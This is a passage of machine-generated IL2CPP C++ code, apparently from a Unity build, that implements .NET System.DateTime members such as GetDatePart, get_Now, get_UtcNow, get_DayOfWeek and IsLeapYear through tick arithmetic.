RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___value0), /*hidden argument*/NULL); int32_t L_1 = ___kind1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_2; memset(&L_2, 0, sizeof(L_2)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_2), L_0, L_1, /*hidden argument*/NULL); return L_2; } } // System.Int64 System.DateTime::ToBinaryRaw() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_ToBinaryRaw_m337980211329E7231056A835F8EB1179A55E927E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { uint64_t L_0 = __this->get_dateData_44(); return L_0; } } extern "C" int64_t DateTime_ToBinaryRaw_m337980211329E7231056A835F8EB1179A55E927E_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_ToBinaryRaw_m337980211329E7231056A835F8EB1179A55E927E(_thisAdjusted, method); } // System.DateTime System.DateTime::get_Date() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_Date_m9466964BC55564ED7EEC022AB9E50D875707B774 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); int64_t L_1 = L_0; uint64_t L_2 = DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_3; memset(&L_3, 0, sizeof(L_3)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_3), ((int64_t)((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)L_1, (int64_t)((int64_t)((int64_t)L_1%(int64_t)((int64_t)864000000000LL)))))|(int64_t)L_2)), /*hidden argument*/NULL); return L_3; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_Date_m9466964BC55564ED7EEC022AB9E50D875707B774_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Date_m9466964BC55564ED7EEC022AB9E50D875707B774(_thisAdjusted, method); } // System.Int32 System.DateTime::GetDatePart(System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___part0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; int32_t V_4 = 0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* V_5 = NULL; int32_t V_6 = 0; int32_t G_B13_0 = 0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* G_B16_0 = NULL; { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_0 = (((int32_t)((int32_t)((int64_t)((int64_t)L_0/(int64_t)((int64_t)864000000000LL)))))); int32_t L_1 = V_0; V_1 = ((int32_t)((int32_t)L_1/(int32_t)((int32_t)146097))); int32_t L_2 = V_0; int32_t L_3 = V_1; V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_2, (int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_3, (int32_t)((int32_t)146097))))); int32_t L_4 = V_0; V_2 = ((int32_t)((int32_t)L_4/(int32_t)((int32_t)36524))); int32_t L_5 = V_2; if ((!(((uint32_t)L_5) == ((uint32_t)4)))) { goto IL_0032; } } { V_2 = 3; } IL_0032: { int32_t L_6 = V_0; int32_t L_7 = V_2; V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_6, (int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_7, (int32_t)((int32_t)36524))))); int32_t L_8 = V_0; V_3 = ((int32_t)((int32_t)L_8/(int32_t)((int32_t)1461))); int32_t L_9 = V_0; int32_t L_10 = V_3; V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_9, (int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_10, (int32_t)((int32_t)1461))))); int32_t L_11 = V_0; V_4 = ((int32_t)((int32_t)L_11/(int32_t)((int32_t)365))); int32_t L_12 = V_4; if ((!(((uint32_t)L_12) == ((uint32_t)4)))) { goto IL_005f; } } { V_4 = 3; } IL_005f: { int32_t L_13 = ___part0; if (L_13) { goto IL_0078; } } { int32_t L_14 = V_1; int32_t L_15 = V_2; int32_t L_16 = V_3; int32_t L_17 = V_4; return ((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_14, (int32_t)((int32_t)400))), (int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_15, (int32_t)((int32_t)100))))), (int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_16, (int32_t)4)))), (int32_t)L_17)), (int32_t)1)); } IL_0078: { int32_t L_18 = V_0; int32_t L_19 = V_4; V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_18, (int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_19, (int32_t)((int32_t)365))))); int32_t L_20 = ___part0; if ((!(((uint32_t)L_20) == ((uint32_t)1)))) { goto IL_008b; } } { int32_t L_21 = V_0; return ((int32_t)il2cpp_codegen_add((int32_t)L_21, (int32_t)1)); } IL_008b: { int32_t L_22 = V_4; if ((!(((uint32_t)L_22) == ((uint32_t)3)))) { goto IL_009e; } } { int32_t L_23 = V_3; if ((!(((uint32_t)L_23) == ((uint32_t)((int32_t)24))))) { goto IL_009b; } } { int32_t L_24 = V_2; G_B13_0 = ((((int32_t)L_24) == ((int32_t)3))? 1 : 0); goto IL_009f; } IL_009b: { G_B13_0 = 1; goto IL_009f; } IL_009e: { G_B13_0 = 0; } IL_009f: { if (G_B13_0) { goto IL_00a8; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_25 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth365_29(); G_B16_0 = L_25; goto IL_00ad; } IL_00a8: { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_26 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth366_30(); G_B16_0 = L_26; } IL_00ad: { V_5 = G_B16_0; int32_t L_27 = V_0; V_6 = ((int32_t)((int32_t)L_27>>(int32_t)6)); goto IL_00bc; } IL_00b6: { int32_t L_28 = V_6; V_6 = ((int32_t)il2cpp_codegen_add((int32_t)L_28, (int32_t)1)); } IL_00bc: { int32_t L_29 = V_0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_30 = V_5; int32_t L_31 = V_6; int32_t L_32 = L_31; int32_t L_33 = (L_30)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_32)); if ((((int32_t)L_29) >= ((int32_t)L_33))) { goto IL_00b6; } } { int32_t L_34 = ___part0; if ((!(((uint32_t)L_34) == ((uint32_t)2)))) { goto IL_00cb; } } { int32_t L_35 = V_6; return L_35; } IL_00cb: { int32_t L_36 = V_0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_37 = V_5; int32_t L_38 = V_6; int32_t L_39 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_38, (int32_t)1)); int32_t L_40 = (L_37)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_39)); return ((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_36, (int32_t)L_40)), (int32_t)1)); } } extern "C" int32_t DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41_AdjustorThunk (RuntimeObject * __this, int32_t ___part0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41(_thisAdjusted, ___part0, method); } // System.Int32 System.DateTime::get_Day() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Day_m3C888FF1DA5019583A4326FAB232F81D32B1478D (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int32_t L_0 = DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, 3, /*hidden argument*/NULL); return L_0; } } extern "C" int32_t DateTime_get_Day_m3C888FF1DA5019583A4326FAB232F81D32B1478D_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Day_m3C888FF1DA5019583A4326FAB232F81D32B1478D(_thisAdjusted, method); } // System.DayOfWeek System.DateTime::get_DayOfWeek() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_DayOfWeek_m556E45050ECDB336B3559BC395081B0C5CBE4891 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); return (int32_t)((((int32_t)((int32_t)((int64_t)((int64_t)((int64_t)il2cpp_codegen_add((int64_t)((int64_t)((int64_t)L_0/(int64_t)((int64_t)864000000000LL))), (int64_t)(((int64_t)((int64_t)1)))))%(int64_t)(((int64_t)((int64_t)7))))))))); } } extern "C" int32_t DateTime_get_DayOfWeek_m556E45050ECDB336B3559BC395081B0C5CBE4891_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_DayOfWeek_m556E45050ECDB336B3559BC395081B0C5CBE4891(_thisAdjusted, method); } // System.Int32 System.DateTime::GetHashCode() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_GetHashCode_mCA2FDAC81B0779FA2E478E6C6D92D019CD4B50C0 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { int64_t V_0 = 0; { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_0 = L_0; int64_t L_1 = V_0; int64_t L_2 = V_0; return ((int32_t)((int32_t)(((int32_t)((int32_t)L_1)))^(int32_t)(((int32_t)((int32_t)((int64_t)((int64_t)L_2>>(int32_t)((int32_t)32)))))))); } } extern "C" int32_t DateTime_GetHashCode_mCA2FDAC81B0779FA2E478E6C6D92D019CD4B50C0_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_GetHashCode_mCA2FDAC81B0779FA2E478E6C6D92D019CD4B50C0(_thisAdjusted, method); } // System.Int32 System.DateTime::get_Hour() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); return (((int32_t)((int32_t)((int64_t)((int64_t)((int64_t)((int64_t)L_0/(int64_t)((int64_t)36000000000LL)))%(int64_t)(((int64_t)((int64_t)((int32_t)24))))))))); } } extern "C" int32_t DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3(_thisAdjusted, method); } // System.DateTimeKind System.DateTime::get_Kind() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { uint64_t V_0 = 0; { uint64_t L_0 = DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_0 = L_0; uint64_t L_1 = V_0; if (!L_1) { goto IL_0018; } } { uint64_t L_2 = V_0; if ((((int64_t)L_2) == ((int64_t)((int64_t)4611686018427387904LL)))) { goto IL_001a; } } { goto IL_001c; } IL_0018: { return (int32_t)(0); } IL_001a: { return (int32_t)(1); } IL_001c: { return (int32_t)(2); } } extern "C" int32_t DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE(_thisAdjusted, method); } // System.Int32 System.DateTime::get_Minute() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Minute_m688A6B7CF6D23E040CBCA15C8CFFBE5EE5C62A77 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); return (((int32_t)((int32_t)((int64_t)((int64_t)((int64_t)((int64_t)L_0/(int64_t)(((int64_t)((int64_t)((int32_t)600000000))))))%(int64_t)(((int64_t)((int64_t)((int32_t)60))))))))); } } extern "C" int32_t DateTime_get_Minute_m688A6B7CF6D23E040CBCA15C8CFFBE5EE5C62A77_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Minute_m688A6B7CF6D23E040CBCA15C8CFFBE5EE5C62A77(_thisAdjusted, method); } // System.Int32 System.DateTime::get_Month() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Month_m9E31D84567E6D221F0E686EC6894A7AD07A5E43C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int32_t L_0 = DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, 2, /*hidden argument*/NULL); return L_0; } } extern "C" int32_t DateTime_get_Month_m9E31D84567E6D221F0E686EC6894A7AD07A5E43C_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Month_m9E31D84567E6D221F0E686EC6894A7AD07A5E43C(_thisAdjusted, method); } // System.DateTime System.DateTime::get_Now() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_0; memset(&V_0, 0, sizeof(V_0)); bool V_1 = false; int64_t V_2 = 0; int64_t V_3 = 0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 V_4; memset(&V_4, 0, sizeof(V_4)); { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_0 = DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1(/*hidden argument*/NULL); V_0 = L_0; V_1 = (bool)0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1 = V_0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_2 = TimeZoneInfo_GetDateTimeNowUtcOffsetFromUtc_m57199B9E169E531B6653648D8520F42F4DC70B7A(L_1, (bool*)(&V_1), /*hidden argument*/NULL); V_4 = L_2; int64_t L_3 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_4), /*hidden argument*/NULL); V_2 = L_3; int64_t L_4 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_0), /*hidden argument*/NULL); int64_t L_5 = V_2; V_3 = ((int64_t)il2cpp_codegen_add((int64_t)L_4, (int64_t)L_5)); int64_t L_6 = V_3; if ((((int64_t)L_6) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0040; } } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_7; memset(&L_7, 0, sizeof(L_7)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_7), ((int64_t)3155378975999999999LL), 2, /*hidden argument*/NULL); return L_7; } IL_0040: { int64_t L_8 = V_3; if ((((int64_t)L_8) >= ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_004e; } } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_9; memset(&L_9, 0, sizeof(L_9)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_9), (((int64_t)((int64_t)0))), 2, /*hidden argument*/NULL); return L_9; } IL_004e: { int64_t L_10 = V_3; bool L_11 = V_1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_12; memset(&L_12, 0, sizeof(L_12)); DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84((&L_12), L_10, 2, L_11, /*hidden argument*/NULL); return L_12; } } // System.DateTime System.DateTime::get_UtcNow() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); int64_t L_0 = DateTime_GetSystemTimeAsFileTime_mE9A326A4F6301E7E932903FC5DA4D1A31060D2C7(/*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1; memset(&L_1, 0, sizeof(L_1)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_1), ((int64_t)((int64_t)((int64_t)il2cpp_codegen_add((int64_t)L_0, (int64_t)((int64_t)504911232000000000LL)))|(int64_t)((int64_t)4611686018427387904LL))), /*hidden argument*/NULL); return L_1; } } // System.Int64 System.DateTime::GetSystemTimeAsFileTime() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_GetSystemTimeAsFileTime_mE9A326A4F6301E7E932903FC5DA4D1A31060D2C7 (const RuntimeMethod* method) { typedef int64_t (*DateTime_GetSystemTimeAsFileTime_mE9A326A4F6301E7E932903FC5DA4D1A31060D2C7_ftn) (); using namespace il2cpp::icalls; return ((DateTime_GetSystemTimeAsFileTime_mE9A326A4F6301E7E932903FC5DA4D1A31060D2C7_ftn)mscorlib::System::DateTime::GetSystemTimeAsFileTime) (); } // System.Int32 System.DateTime::get_Second() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Second_m0EC5A6215E5FF43D49702279430EAD1B66302951 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); return (((int32_t)((int32_t)((int64_t)((int64_t)((int64_t)((int64_t)L_0/(int64_t)(((int64_t)((int64_t)((int32_t)10000000))))))%(int64_t)(((int64_t)((int64_t)((int32_t)60))))))))); } } extern "C" int32_t DateTime_get_Second_m0EC5A6215E5FF43D49702279430EAD1B66302951_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Second_m0EC5A6215E5FF43D49702279430EAD1B66302951(_thisAdjusted, method); } // System.Int64 System.DateTime::get_Ticks() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); return L_0; } } extern "C" int64_t DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60(_thisAdjusted, method); } // System.TimeSpan System.DateTime::get_TimeOfDay() extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 DateTime_get_TimeOfDay_mAC191C0FF7DF8D1370DFFC1C47DE8DC5FA048543 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_1; memset(&L_1, 0, sizeof(L_1)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((&L_1), ((int64_t)((int64_t)L_0%(int64_t)((int64_t)864000000000LL))), /*hidden argument*/NULL); return L_1; } } extern "C" TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 DateTime_get_TimeOfDay_mAC191C0FF7DF8D1370DFFC1C47DE8DC5FA048543_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_TimeOfDay_mAC191C0FF7DF8D1370DFFC1C47DE8DC5FA048543(_thisAdjusted, method); } // System.Int32 System.DateTime::get_Year() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Year_m019BED6042282D03E51CE82F590D2A9FE5EA859E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { int32_t L_0 = DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, 0, /*hidden argument*/NULL); return L_0; } } extern "C" int32_t DateTime_get_Year_m019BED6042282D03E51CE82F590D2A9FE5EA859E_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_Year_m019BED6042282D03E51CE82F590D2A9FE5EA859E(_thisAdjusted, method); } // System.Boolean System.DateTime::IsLeapYear(System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7 (int32_t ___year0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___year0; if ((((int32_t)L_0) < ((int32_t)1))) { goto IL_000c; } } { int32_t L_1 = ___year0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)9999)))) { goto IL_0021; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral20129DCACE911064DD71D775424F848ED70E9328, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteral4FF0B1538469338A0073E2CDAAB6A517801B6AB4, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7_RuntimeMethod_var); } IL_0021: { int32_t L_4 = ___year0; if (((int32_t)((int32_t)L_4%(int32_t)4))) { goto IL_0039; } } { int32_t L_5 = ___year0; if (((int32_t)((int32_t)L_5%(int32_t)((int32_t)100)))) { goto IL_0037; } } { int32_t L_6 = ___year0; return (bool)((((int32_t)((int32_t)((int32_t)L_6%(int32_t)((int32_t)400)))) == ((int32_t)0))? 1 : 0); } IL_0037: { return (bool)1; } IL_0039: { return (bool)0; } } // System.DateTime System.DateTime::Parse(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Parse_mFB11F5C0061CEAD9A2F51E3814DEBE0475F2BA37 (String_t* ___s0, RuntimeObject* ___provider1, const 